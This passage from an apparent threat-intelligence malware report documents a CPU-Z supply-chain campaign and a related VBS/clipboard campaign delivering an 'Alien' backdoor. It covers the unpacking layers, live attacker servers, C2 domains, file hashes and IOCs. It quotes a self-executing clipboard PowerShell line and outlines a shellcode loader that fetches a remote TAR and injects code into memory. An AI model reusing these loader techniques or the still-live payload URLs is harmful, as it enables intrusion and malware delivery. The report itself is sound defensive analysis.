9	PS execution	`[Console]::In.ReadToEnd() \| Invoke-Expression`	Exact same command in sandbox
10	Encryption	XXTEA constant `0x61c88647` + zlib	Same XXTEA + DEFLATE in out.dll
11	API hashing	ROR-14 for kernel32/VirtualProtect/CreateThread	Same hashes resolved
12	Campaign tracking	`# Tag:` regex from clipboard	`# Tag: tbs` in VBS + `{"tag":"tbs"}` in DLL
13	C2 IP	`95.216.51.236` (Hetzner)	FileZilla DLL contacts same IP
14	Reflective loader	Exports `init`, ROR-13 hashing	out.dll exports `init`, ROR-13 in loader

The beacon performs:

DNS-over-HTTPS resolution via Cloudflare (1.1.1.1)
HTTPS POST to welcome.supp0v3.com/d/callback with campaign config
Receives PowerShell/C# backdoor code from C2
Pipes code to powershell.exe via stdin for execution

The embedded out.dll is the component that contacts welcome.supp0v3.com/d/callback and pipes the C2-received code to PowerShell, completing the cycle back to persistence.

A.7 STX RAT Unpacking via Unicorn Emulation

The STX RAT binary uses 3 recursive layers of XXTEA+zlib wrapping. Standard XXTEA implementations fail because the malware uses a custom variant. We built a Unicorn CPU emulator-based decryptor (stxrat-decryptor/stxrat_decrypt.py) that emulates the exact XXTEA function from the binary.

Peeling results:

Layer	Input Size	After XXTEA	After zlib	SHA256 (output)
1	351,232 B	343,420 B	346,112 B	`6cb3a9ad7618b36e...`
2	346,112 B	338,376 B	341,504 B	`0cd252acbc97a9d9...`
3	341,504 B	333,324 B	588,800 B	`3455ec49b8dc3743...`

Final core PE (588,800 bytes):

Property	Value
SHA256	`3455ec49b8dc3743398a20c271194682eba40a67ee3b10549d3e6f837f7499ca`
VT	View
Machine	AMD64
Entry	`0x69A14` (real entry, not the XXTEA wrapper's `0x1000`)
.text	430 KB (real code)
.rdata	69 KB (constants, crypto provider strings)
.data	71 KB raw / 95 KB virtual (AES-encrypted string table)
Imports	`KERNEL32.dll`, `Secur32.dll`
Exports	`init` (single export)

Visible strings in the core PE:

Microsoft Enhanced RSA and AES Cryptographic Provider -- for AES-128-CTR string decryption
Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider -- for X25519/Ed25519
Microsoft Unified Security Protocol Provider -- for TLS/SSPI
InitSecurityInterfaceA -- Secur32 SSPI initialization
Base64 alphabet, datetime format strings, and 2,906 total strings (most still AES-encrypted)

The C2 domains, IP addresses, feature strings, and campaign config remain encrypted in the .data section using rolling XOR + AES-128-CTR (per-entry keys). Decrypting this layer requires emulating the Windows CryptoAPI (CryptDecrypt), which is beyond pure CPU emulation.

Decryptor tool: stxrat-decryptor/stxrat_decrypt.py (requires uv with unicorn, capstone, pefile)

All decrypted payloads saved locally:

samples/dropped/BuildCache_dec_decrypted.bin (Dec 2025)
samples/dropped/BuildCache_march_decrypted.bin (Mar 2026)
samples/dropped/BuildCache_april_decrypted.bin (Apr 2026)
samples/dropped/BuildCache_*_outdll.bin (extracted embedded PEs)

Appendix B: Live Infrastructure & Earlier Campaign Analysis

Probed 2026-04-10. All findings below are from still-live attacker infrastructure.

B.1 Infrastructure Status (as of 2026-04-10)

Asset	Status	Detail
`supp0v3.com` (all subdomains)	DOWN	NXDOMAIN -- DNS nameservers removed entirely
`147.45.178.61` (backend)	ALIVE	Apache httpd, HTTP 200, serving "Hello, world" page
`/file/` on backend	ALIVE	HTTP 403 (dir listing off, but files accessible by name)
`/file/t10/LibreOffice...vbs`	ALIVE	HTTP 200, 13,810 bytes -- serving VBS exploit payload
`/file/GoogleDriveSetup.vbs`	ALIVE	HTTP 200, 13,747 bytes -- serving VBS exploit payload
`qwen1.pages.dev/continue`	ALIVE	HTTP 200 -- serving 481KB TAR with shellcode + PS loader
R2 `pub-45c25.../cpu-z_2.19-en.zip`	ALIVE	HTTP 200, 6,050,530 bytes -- hash-verified match to our sample
R2 `pub-45c25.../` (other files)	BLOCKED	HTTP 403 (hwmonitor, perfmonitor, powermax all blocked)
R2 `pub-fd67c...`	DOWN	HTTP 404
R2 `pub-f3252...`	DOWN	HTTP 404

B.2 VBS Exploit Payloads (from 147.45.178.61)

Downloaded from the still-live backend server at paths used by the CVE-2023-36025 .url shortcut exploits.

B.2.1 LibreOffice_25.8.4_Win_x86-64.vbs

Property	Value
Path	`http://147.45.178.61/file/t10/LibreOffice_25.8.4_Win_x86-64.vbs`
Size	13,810 bytes
SHA256	`8071577153e29cc19c93302858bd88a149077c2b89fb439c61e8c278a05e3187`
Build date	2025-10-31
Author	`@d_coroner`
Generator	`generate_vbs.py` from `release.vbs` template (Jinja2: `main.js.j2`)
Campaign tag	`# Tag: tbs`
C2 callback	`# Callback: https://welcome.supp0v3.com/d/callback`
Staging URL	`https://qwen1.pages.dev/continue?uid=371803630623&token=PipgANUF...`
Decoy action	Opens real LibreOffice installer from `download.documentfoundation.org`

Full execution flow (3-layer matryoshka):

LAYER 1: VBS (delivered via .url CVE-2023-36025 over WebDAV)
├── Builds a JavaScript string containing layers 2+3
├── Writes it to %TEMP%\LibreOffice_25.8.4_Win_x86-64.msi.js
└── ShellExecute wscript.exe "tempfile.js" /elevated, "runas"  ← UAC ELEVATION
         │
         ▼
LAYER 2: JavaScript (runs elevated as wscript.exe)
├── Opens REAL LibreOffice installer as decoy:
│     WScript.Shell.Run("https://download.documentfoundation.org/.../LibreOffice_25.8.4_Win_x86-64.msi")
├── Writes PowerShell code to %TEMP%\~clip.txt
├── Pipes to clipboard: cmd /c type ~clip.txt | clip
├── Deletes ~clip.txt
└── ExecuteCommand(embeddedText, 256)
      → First 256 chars = powershell -c "Invoke-Expression(
           ([System.Text.StringBuilder]::new((Get-Clipboard -Raw))).Remove(0, 256).ToString());"
      → This reads the clipboard, strips the first 256 chars (the PS command itself), executes the rest
         │
         ▼
LAYER 3: PowerShell (from clipboard, with progress bar social engineering)
├── Displays ASCII art banner "LiteLLM" and "Deployment in progress..."
├── Compiles C# TarExtractor class inline (Add-Type) for in-memory TAR parsing
├── Downloads TAR from: https://qwen1.pages.dev/continue?uid=371803630623&token=PipgANUF...
├── Extracts TAR in memory:
│     ├── 1.bin (*.bin) → reversed base64 string → stored in $configurationString
│     └── 2.txt (*.txt) → PowerShell shellcode loader → executed via IEX
├── 2.txt loads $configurationString, reverses it, base64-decodes → Alien PE (351KB)
├── VirtualAlloc (RWX) + WriteProcessMemory + delegate invoke at offset 4592
└── Alien backdoor executes → C2: welcome.supp0v3.com/d/callback

Key observations:

The ASCII banner shows "LiteLLM" -- the malware disguises itself as a legitimate LiteLLM AI proxy deployment
Progress messages (50% done, 75% done, 100% done) provide social engineering cover
The Remove(0, 256) trick is clever: the PowerShell command itself is exactly 256 chars (padded with spaces), then it strips itself from the clipboard content and executes the remaining code
The .js extension (LibreOffice_25.8.4_Win_x86-64.msi.js) mimics the real MSI filename but with .js appended
UAC elevation is requested via runas, meaning the backdoor runs as admin

B.2.2 GoogleDriveSetup.vbs

Property	Value
Path	`http://147.45.178.61/file/GoogleDriveSetup.vbs`
Size	13,747 bytes
SHA256	`cc8d281ee96d60669dfe2353bc8bcb4da5c15ae18aeecce606bcc7e48ac49ce2`
Build date	2025-10-31
Author	`@d_coroner`
Campaign tag	`# Tag: click` (different from LibreOffice's `tbs`)
C2 callback	`# Callback: https://helloworld.supp0v3.com/d/callback` (test subdomain)
Staging URL	`https://qwen1.pages.dev/continue?uid=686284849961&token=9oIvxTfx...`
Decoy action	Opens real Google Drive installer from `dl.google.com`

Same 3-layer technique as LibreOffice variant with these differences:

Difference	LibreOffice	GoogleDrive
Temp JS filename	`LibreOffice_25.8.4_Win_x86-64.msi.js`	`GoogleDriveSetup.exe.js`
Campaign tag	`# Tag: tbs`	`# Tag: click`
C2 subdomain	`welcome.supp0v3.com` (production)	`helloworld.supp0v3.com` (test/dev)
Staging UID	`uid=371803630623`	`uid=686284849961`
Decoy URL	`download.documentfoundation.org/.../LibreOffice_25.8.4_Win_x86-64.msi`	`dl.google.com/drive-file-stream/GoogleDriveSetup.exe`
Hostname comment	`# Hostname: libreoffice`	`# Hostname: googledrive`

The use of helloworld.supp0v3.com (first seen 2025-11-17) vs welcome.supp0v3.com (first seen 2025-12-11) suggests the GoogleDrive variant was an earlier iteration using the test C2 subdomain.

B.3 qwen1.pages.dev Staging Payload

The staging server hosts the second-stage payload for the .url exploit chain. Both VBS payloads (LibreOffice/GoogleDrive, despite different UIDs and tokens) receive identical content.

Property	Value
URL	`https://qwen1.pages.dev/continue?uid=<victim_id>&token=<tracking>`
Status	ALIVE (HTTP 200 as of 2026-04-10)
Type	POSIX TAR archive (GNU)
Size	481,280 bytes
SHA256	`fd0c4e1b877f8e787b5cd479a408f37238d17a879e2885839b3e108a8d5d6c55`

TAR contents:

File	Size	Description
`1.bin`	468,312 B	Reversed base64-encoded Alien PE (the actual backdoor)
`2.txt`	9,520 B	PowerShell shellcode loader (VirtualAlloc + WriteProcessMemory + delegate invoke)

B.3.1 1.bin -- Reversed Base64 Alien Backdoor PE

Property	Value
Encoding	Base64, character-reversed (`==AAAA...` -> reverse -> `TVqQ...` -> decode)
Decoded size	351,232 bytes
Decoded SHA256	`b7d64d6a9c641855f400949c8c000e1b53b9355fbe3663e41f01e4b80f8eab60`
Type	PE32+ executable (AMD64) -- MZ header confirmed
Entry offset	4592 (0x11F0) -- compare with BuildCache out.dll reflective loader at 0x11F4 (4 bytes apart)
Identification	Backdoor.Win64.Alien -- same PE structure, same string patterns as BuildCache out.dll

This is the same backdoor family as the CPUID campaign payload, delivered through a different vector (VBS + clipboard hijack instead of DLL sideloading).

B.3.2 2.txt -- PowerShell Shellcode Loader

A 9,520-byte PowerShell script that:

Get-SystemDelegate -- creates dynamic .NET delegate types at runtime (same technique as New-DelegateType in the CPUID PowerShell stage)
Add-Type with P/Invoke -- compiles C# with VirtualAlloc, WriteProcessMemory, GetCurrentProcess from kernel32.dll
ConvertFrom-ReversedString -- reverses the base64 string from 1.bin
Initialize-PayloadExecution -- base64-decodes the reversed string, builds a parameter overlay structure
Invoke-ProcessMemoryOperation -- VirtualAlloc (RWX) + WriteProcessMemory + Marshal.GetDelegateForFunctionPointer at entry offset 4592 + invoke

The variable naming uses business/enterprise themes (ConfigurationMode, RuntimeConfig, PayloadProcessor) -- the same obfuscation style as the CPUID PowerShell stage ($marketManager, $customerAgent).

B.4 Evidence Linkage Summary

                    .url EXPLOIT CAMPAIGN                    CPUID SUPPLY CHAIN
                    (Oct-Dec 2025)                           (Dec 2025 - Apr 2026)
                    ─────────────────                        ─────────────────────

  Delivery:         .url shortcut files                      Trojanized ZIPs / Inno Setup
                    CVE-2023-36025                           DLL sideloading (CRYPTBASE.dll)
                         │                                        │
  Hosting:          147.45.178.61                            Cloudflare R2 buckets
                    (WebDAV /file/)                          (redirected from cpuid.com)
                         │                                        │
  Stage 1:          VBS -> clipboard PS                      CRYPTBASE.dll -> reflective load
                         │                                        │
  Stage 2:          qwen1.pages.dev TAR                      out.dll XXTEA+DEFLATE decrypt
                    (reversed base64 PE)                     (colon-hex encoded shellcode)
                         │                                        │
  Payload:          Alien PE (351 KB)          ═══════        Alien PE (355-380 KB)
                    entry @ 0x11F0                           entry @ 0x11F4
                         │                                        │
  C2:               helloworld.supp0v3.com ──── SAME ──── welcome.supp0v3.com
                    /d/callback               DOMAIN          /d/callback
                         │                                        │
  Backend:          ai.supp0v3.com ──────────── SAME ──────── ai.supp0v3.com
                    -> 147.45.178.61             IP           -> 147.45.178.61
                         │                                        │
  Tag:              "tbs" / "click"  ─────────── SAME ──────── "tbs" / "cpz"
                                                TAG

Strong links (verified):

Same C2 domain (supp0v3.com) with same callback path (/d/callback)
Same campaign tag (tbs) in both VBS headers and DLL C2 config JSON
Same backend IP (147.45.178.61) via DNS (ai.supp0v3.com) and direct .url reference
Same backdoor PE family (Alien) with near-identical entry point offsets (0x11F0 vs 0x11F4)
Same PowerShell obfuscation style (business-themed variable names, dynamic delegate creation)

The @d_coroner handle:

Appears as // Author: @d_coroner in VBS payload headers on the backend server
Also found in the MEXC CRYPTBASE.dll via VT content search (same file that contains supp0v3.com)
Not publicly documented in any threat intelligence -- no matches on GitHub, Twitter, Telegram, or forums
Should be treated as an unverified handle from payload metadata (could be the developer, an alias, or misdirection)

B.5 Additional IOCs from Live Infrastructure

File Hashes (newly collected)

SHA256	File	Source
`8071577153e29cc19c93302858bd88a149077c2b89fb439c61e8c278a05e3187`	LibreOffice_25.8.4_Win_x86-64.vbs	Live: `http://147.45.178.61/file/t10/`
`cc8d281ee96d60669dfe2353bc8bcb4da5c15ae18aeecce606bcc7e48ac49ce2`	GoogleDriveSetup.vbs	Live: `http://147.45.178.61/file/`
`fd0c4e1b877f8e787b5cd479a408f37238d17a879e2885839b3e108a8d5d6c55`	qwen1 staging TAR (both UIDs)	Live: `https://qwen1.pages.dev/continue`
`b7d64d6a9c641855f400949c8c000e1b53b9355fbe3663e41f01e4b80f8eab60`	Decoded Alien PE (from TAR 1.bin)	Extracted from staging TAR
`8f7116cfefa56af3...`	2.txt PowerShell loader	Extracted from staging TAR

Network IOCs (newly discovered)

Indicator	Type	Context
`qwen1.pages.dev`	Staging domain	Cloudflare Pages, delivers TAR with shellcode
`https://qwen1.pages.dev/continue?uid=371803630623&token=PipgANUF...`	Staging URL	LibreOffice campaign
`https://qwen1.pages.dev/continue?uid=686284849961&token=9oIvxTfx...`	Staging URL	GoogleDrive campaign
`http://147.45.178.61/file/t10/LibreOffice_25.8.4_Win_x86-64.vbs`	WebDAV payload	Still live
`http://147.45.178.61/file/GoogleDriveSetup.vbs`	WebDAV payload	Still live

Local Sample Repository

cpu-z-april-supply-chain/
  ANALYSIS.md                                        <- This document
  cpu-z_2.19-en.zip                                  <- Primary trojanized package (VT-downloaded)
  samples/
    CRYPTBASE_bundled.dll                            <- Malicious DLL from ZIP (2.08 MB)
    CRYPTBASE_variant.dll                            <- Related DLL variant (1.20 MB)
    cpuz_x32.exe                                     <- Legitimate CPU-Z 32-bit (signed by CPUID+Microsoft)
    cpuz_x64.exe                                     <- Legitimate CPU-Z 64-bit (signed by CPUID+Microsoft)
    decoded_payload.bin                              <- Decoded shellcode+PE from .rdata (349 KB)
    dropped/                                         <- C2-delivered persistence components (from VT)
      CommonBuild.proj                               <- MSBuild C# shellcode loader (3.9 KB)
      ActiveX.sct                                    <- COM hijacking scriptlet (977 B)
      Clippy.sct                                     <- IPv6-encoded .NET runner (11.8 KB)
      Moniker.dll                                    <- Extracted .NET assembly from Clippy.sct (4.1 KB)
      BuildCache_april.dat                           <- Final shellcode, XOR-encrypted (760 KB, Apr 2026)
      BuildCache_march.dat                           <- Final shellcode, XOR-encrypted (732 KB, Mar 2026)
      BuildCache_dec.dat                             <- Final shellcode, XOR-encrypted (710 KB, Dec 2025)
      BuildCache_*_decrypted.bin                     <- XOR-decrypted versions
      BuildCache_*_outdll.bin                        <- Extracted out.dll PEs from decrypted payloads
    backend/                                         <- Files from LIVE backend infrastructure
      LibreOffice_25.8.4_Win_x86-64.vbs             <- VBS exploit payload (live from 147.45.178.61)
      GoogleDriveSetup.vbs                           <- VBS exploit payload (live from 147.45.178.61)
      qwen1_staging_libreoffice.ps1                  <- TAR from qwen1.pages.dev (481 KB)
      qwen1_staging_googledrive.ps1                  <- TAR from qwen1.pages.dev (identical)
      tar_1.bin                                      <- Reversed base64 Alien PE (468 KB)
      tar_2.txt                                      <- PowerShell shellcode loader (9.5 KB)
      decoded_shellcode_from_staging.bin             <- Decoded Alien PE from 1.bin (351 KB)
      r2_live_cpu-z_2.19-en.zip                      <- Trojanized ZIP still served from R2 (hash-verified)
  extracted/
    cpu-z_2.19-en (1)/                               <- Extracted ZIP contents

Report generated: 2026-04-10 | Classification: TLP:CLEAR

N3mes1s/ANALYSIS.md